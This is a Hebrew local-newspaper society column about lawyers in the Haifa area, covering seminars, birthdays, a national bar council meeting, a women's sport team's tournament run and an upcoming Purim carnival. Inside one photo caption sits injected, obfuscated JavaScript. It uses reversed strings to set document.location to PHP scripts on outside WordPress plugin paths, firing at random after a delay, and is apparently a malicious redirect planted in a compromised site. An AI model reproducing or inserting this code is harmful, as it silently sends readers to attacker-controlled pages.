fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

משתלמים ומתכוננים לפורים

מדור הפרקליטים של הד הקריות: ימי עיון מעשירים, ימי הולדת, בילויים, הכנסת אורחים, כדורשת וכוננות פורים
מדור הפרקליטים | צילום: shutterstock
מדור הפרקליטים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מדור הפרקליטים של הד הקריות – המדור הכי משפטי שיש: ימי עיון, ימי הולדת, הכנסת אורחים, כדורשת וכוננות פורים

מתמזגים

מדור הפרקליטים פוצח בהרעשה. לאוזניו של המדור השתרבבה שמועה על מיזוג פירמת עורכי הדין לנקרי ושות'.
עו"ד יניב לנקרי, אה?
"בשלב זה אין תגובה".

יום עיון

בשני השבוע התקיים במוקד קריות של לשכת עורכי הדין מחוז חיפה יום עיון בראשותו של עו"ד מימון טולדנו. לספרייה העירונית בקריית אתא עלו ובאו יותר מ-50 עורכי דין, ששמעו הרצאות בנושאי שיווק, מיתוג וניהול משרד עורכי דין.
את יום העיון פתחה בדברי ברכה סגניתו של עו"ד טולדנו במוקד קריות, עו״ד בת אל מנור, ולאחר מכן הרצתה חגית יצחק בנושא שיווק ויחסי ציבור למשרד עורכי דין. יועץ המס בני קיוויתי דיבר על היכרות עם דרישות החוק בנושא מיסוי מהעסק הקטן, ועו״ד סאמי אבו ורדה קינח עם הרצאה בנושא שיווק ושימור לקוחות. היה מעשיר.

יום עיון בקרית אתא. עו"ד בת אל מנור ועו"ד מימון טולדנו | צילום: יח"צ
יום עיון בקרית אתא. עו"ד בת אל מנור ועו"ד מימון טולדנו | צילום: יח"צ

יום הולדת

אלעד יצחק מקרית אתא, בנה של עו"ד ליטל יצחק חגג יום הולדת 6 ביום האהבה. סיבה מספיק טובה לנסוע עם אמא והאח הקטן לידור לגן גורו ללטף קנגורו ולאכיל תוכים. היה מוי כיף. מדור הפרקליטים מאחל מזל טוב.

חוגגים בגן גורו. עו"ד ליטל יצחק והבנים אלעד ולידור | צילום: עצמי
חוגגים בגן גורו. עו"ד ליטל יצחק והבנים אלעד ולידור | צילום: עצמי

רשלנות רפואית

אפרופו ימי עיון. לאחר שבוע עמוס שבו עסק עו"ד סאמי אבו ורדה, מומחה לרשלנות רפואית ונזקי גוף, בנושא מחדל התרופות פגות התוקף בבית החולים רמב"ם וקיבל במשרדו מאות פניות של משפחות חולים שטופלו במחלקה האונקולוגית בבית החולים, התפנה עו"ד אבו ורדה להעביר הרצאה מרתקת בלשכת עורכי הדין במחוז חיפה בפני עשרות עורכי דין בנושא "רשלנות רפואית ברפואת המשפחה".

רשלנות רפואית. עו"ד סאמי אבו ורדה | צילום: יח"צ
רשלנות רפואית. עו"ד סאמי אבו ורדה | צילום: יח"צ

מתארחים

בראשון השבוע אירח מחוז חיפה של לשכת עורכי הדין, בראשותה של עו"ד תמי אולמן, את ישיבת המועצה הארצית בראשות עו"ד אבי חימי. היו שם: יו"ר מחוז מרכז של לשכת עורכי הדין עו"ד רומי קנבל, יו"ר מחוז תל אביב עו"ד עמית בכר, חברי המועצה הארצית של הלשכה וחברי ועד מחוז חיפה: עו"ד ענבל בית הלחמי, עו"ד אדיר צבי, עו"ד שי פניני, עו"ד מימון טולדנו, עו"ד בלהה מצגר, עו"ד טל אבריאל, עו"ד איתי פריימן ועוד עו"דים. מי שעוד היו שם הם מנכ"ל לשכת עורכי הדין בישראל אורי אלפרסי, מנכ"לית מחוז חיפה של לשכת עורכי הדין רביטל אלמוז ומנכ"לים של מחוזות נוספים בארץ. רגע לא סיימנו. קחו אוויר ודלגו לאייטם הבא.

עו"ד אבי חימי אמר לאחר הישיבה: "הישיבה התקיימה בבית הפרקליט של מחוז חיפה כהמשך ישיר להבטחתי, עם כניסתי לתפקיד, על שילוב ושיתוף בעשייה השוטפת של כל מחוזות הלשכה, ובכלל זה קיום ישיבות מועצה בתחום שיפוטם. עד כה קיימנו ישיבות במחוז צפון, במחוז ירושלים והשבוע, כאמור, זכינו לאירוח נפלא במחוז חיפה".

ישיבת המועצה הארצית של עורכי הדין התארחה בחיפה | צילום: ועד מחוז חיפה
ישיבת המועצה הארצית של עורכי הדין התארחה בחיפה | צילום: ועד מחוז חיפה

זה גם ספורט

נבחרת הכדורשת נשים של לשכת עורכי הדין מחוז חיפה בניצוחה של הקפטנית עו"ד חפצי דנינו ממשיכה להביא כבוד. בטורניר הכתר בירושלים – שבו השתתפו 32 קבוצות כדורשת מישראל ומחו"ל, בין היתר, מאוסטריה, יוון ואיטליה – ניצחה נבחרת המחוז בחלוקה לבתים את הקבוצות: נט מיקס מהמרכז, עומר מירושלים ובית הכרם מירושלים והעפילה למשחק רבע הגמר מול קבוצת ג'ורג'ס, שבו ניצחו עורכות הדין והעפילו למשחק חצי הגמר נגד קבוצת פיוניר כפר סבא. הנבחרת סיימה במקום הרביעי מתוך 32. שאפו ענק ומחיאות כפיים סוערות לעורכות הדין חפצי דנינו, אורית קורן, יערה לב ירמיהו, נטלי אלגרבלי, נועם דיסגני, אינסה שיכמן, אילנה לוי ויגדור ונווה ברוש.

הביאו הרבה כבוד. נבחרת הכדורשת נשים של לשכת עורכי הדין מחוז חיפה | צילום: ועד מחוז חיפה
הביאו הרבה כבוד. נבחרת הכדורשת נשים של לשכת עורכי הדין מחוז חיפה | צילום: ועד מחוז חיפה

הוצל"פ

מהי הפרקטיקה של ניהול הליך חדלות פירעון ליחיד על פי חוק? במוקד טמרה של לשכת עורכי הדין, בראשות עו"ד מועין ערמוש, התקיים יום עיון בנושא תקנות חדלות פירעון ושיקום כלכלי, שרוכז על ידי עוה"ד ענבל בית הלחמי, איתי פריימן ואסיא סיוון, יו"רים משותפים ועדת חדלות פירעון. הרצו: רשם לשכת ההוצאה לפועל קריות עופר שורק וב"כ הכונס הרשמי והאפוטרופוס הכללי מחוז חיפה והצפון עו"ד אוריאל יצחק כפיר.

הרצאה בנושא חדלות פירעון במוקד טמרה | צילום: יח"צ
הרצאה בנושא חדלות פירעון במוקד טמרה | צילום: יח"צ

ביקור אח"מ

מי מאיתנו לא זוכה לביקור אישי של שר הכלכלה? השר אלי כהן הגיע השבוע למשרדו של עו"ד רועי סבג מקרית מוצקין. המדור, שלא התאפק, גילה כי עו"ד סבג, המייצג תעשיינים בכירים במשק, דן עם השר באפשרויות לקידום הקמת מפעלי תעשייה בצפון הארץ ללקוחותיו, תוך הקצאת קרקעות, מתן הטבות ומימון מהמדינה.
סבג, ביקור אישי?
"השר כהן הדגיש את החשיבות שהוא מייחס למפעלים ישראלים המייצרים כחול לבן והבטיח לסייע לתעשיינים ואף קבענו פגישת עבודה נוספת בחודש הבא".

שר הכלכלה אלי כהן מתארח במשרדו של עו"ד רועי סבג מקרית מוצקין | צילום: עצמי
שר הכלכלה אלי כהן מתארח במשרדו של עו"ד רועי סבג מקרית מוצקין | צילום: עצמי

מוי כיף

עו"ד שי פניני, חבר ועד לשכת עורכי הדין חיפה, חגג בסוף השבוע יום הולדת ארוך במיוחד. החגיגות החלו עם החברים הטובים עו"ד אדיר צבי, חבר ועד לשכת עורכי הדין חיפה גם כן, ועו"ד יריב רז במועדון המוריסון בכרמל, ומשם עברה החבורה למועדון הלובי ולששון בר. את שבוע יום ההולדת סיים האדווקט בחדר ה"בוקס" הפרטי באצטדיון סמי עופר במשחק בין מכבי חיפה להפועל חדרה. שם כבר חגג עם הילדים.
עו"ד פניני, מזל טוב.
"תודה, תודה. מנסים להתאושש".
ורק מדור הפרקליטים יושב לבד בחושך.

יום הולדת, חגיגה נחמדת. עו"ד שי פניני והג'וניור | צילום: עצמי
יום הולדת, חגיגה נחמדת. עו"ד שי פניני והג'וניור | צילום: עצמי

אינגליש

רוצים לדעת מניין האנגלית שלי? לשכת עורכי הדין מחוז חיפה תקיים השתלמות באנגלית למשפטנים (דיבור וכתיבה). ההשתלמות מרוכזת אקדמית על ידי שרי קרישבלום גברא, מתמחה בלימוד אנגלית עסקית ואנגלית מדוברת ומרצה מבוקשת בחברות הייטק ומשרדי עורכי דין. מהרו להירשם.

זהירות בדרכים

יו"ר ועדת האתיקה, עו"ד שאדי סרוג'י, הרצה השבוע בפני עורכי הדין של מחוז חיפה בהשתלמות בדיני תעבורה. עו"ד סרוג'י דיבר על חוק הלשכה, כללים, שאילתות וסוגיות אתיות מעולם התעבורה, אך לא רק. לפניו הרצה עו"ד יוסי יעקבי, יו"ר משותף ועדת תעבורה בלשכת עורכי הדין, בנושא שיכרות.

השתתפות שיא

לא פחות מ-360 עורכי דין נרשמו להשתלמות בדיני עבודה של לשכת עורכי הדין חיפה, שנאלצה לסגור את ההרשמה. ההשתלמות מרוכזת על ידי עוה"ד ארנית זוננברג ושחר הופמן, יו"רים משותפים של ועדת בית דין לעבודה ועו"ד שרית לוינסקי מפרקליטות מחוז חיפה.

זמן קרנבל

לשכת עורכי הדין מתכוננת לקרנבל פורים ענק, בו ישתתפו אדווקטים מכל רחבי הארץ, וזה יקרה במתחם לאגו בראשון לציון ב-10 במרס. בתוכנית: תחרות תחפושות נושאת פרסים, בר אוכל, בר אלכוהול חופשי, די ג'יי והופעה של ליאור נרקיס. אם המדור יתחפש לעורך דין, ייתנו לו להיכנס?

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות